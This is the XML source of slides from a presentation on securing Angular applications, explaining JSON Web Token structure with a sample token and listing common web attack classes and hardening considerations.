          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6768752" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 				            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle à coins arrondis 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="1635646"/>
            <a:ext cx="7993063" cy="792088"/>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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>eyJhbGciOiJIUzI1NiJ9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>eyJzdWIiOiJKb2huIFNtaXRoIiwibmJmIjoxNDgzNjMzNjMzLCJpc3MiOiJhbmd1bGFyLXNoaXJvIiwiZXhwIjoxNDgzNjM0NTMzLCJpYXQiOjE0ODM2MzM2MzMsImp0aSI6IjFmNDJkN2YwLTMxNjEtNGM5Yy1iMDE2LThiNzMwMzE4NGVjMiJ9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>8KPFOMtz37hOHzwxmNQt1Lj8POYipfrftjs7KY3_wbc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Tableau 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381789370"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179512" y="2712067"/>
          <a:ext cx="8893175" cy="1947915"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{3B4B98B0-60AC-42C2-AFA5-B58CD77FA1E5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2520477"/>
                <a:gridCol w="2952559"/>
                <a:gridCol w="3420139"/>
              </a:tblGrid>
              <a:tr h="331607">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>JOSE Header</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91447" marR="91447" marT="45733" marB="45733"/>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600" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>JWS Payload</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91447" marR="91447" marT="45733" marB="45733"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>JWS Signature</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91447" marR="91447" marT="45733" marB="45733"/>
                </a:tc>
              </a:tr>
              <a:tr h="1281002">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82550" lvl="1" indent="0">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="1" indent="0">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>alg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>": "HS256",</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="1" indent="0">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>  "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>typ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>": "JWT"</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="1" indent="0">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91447" marR="91447" marT="45733" marB="45733" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>"sub": "1234567890",</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>   "name": "John Doe",</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>   "admin": true</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> }</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91447" marR="91447" marT="45733" marB="45733"/>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>HMACSHA256( </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>   base64UrlEncode(header) + "." +</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>   base64UrlEncode(payload), </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>   secret)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent6"/>
                        </a:solidFill>
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91447" marR="91447" marT="45733" marB="45733" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="331607">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Base64url </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>encoded</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91447" marR="91447" marT="45733" marB="4573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kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Base64url </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>encoded</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91447" marR="91447" marT="45733" marB="45733" anchor="ctr"/>
                </a:tc>
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234556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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6869072" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>		          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Angular security hardening</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07504" y="915566"/>
            <a:ext cx="9001000" cy="3816424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Vulnerable to common attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>broken authentication &amp; session management, CSRF, IDOR, third party components, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Particularly vulnerable to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>XSS &amp; template injection &amp; JSON(P) hijacking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>ndirectly modern browsers weaknesses, unsecure REST API, 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> party </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> modules, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Angular security hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>&amp; basic Security Skills </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(training)</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>Angular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>evolution is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>fast ! (need flexibility, Patch management, browser compatibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>PCI context </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Migration challenging : possible with appropriate team resources (skills, budget, time, client approbation)</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
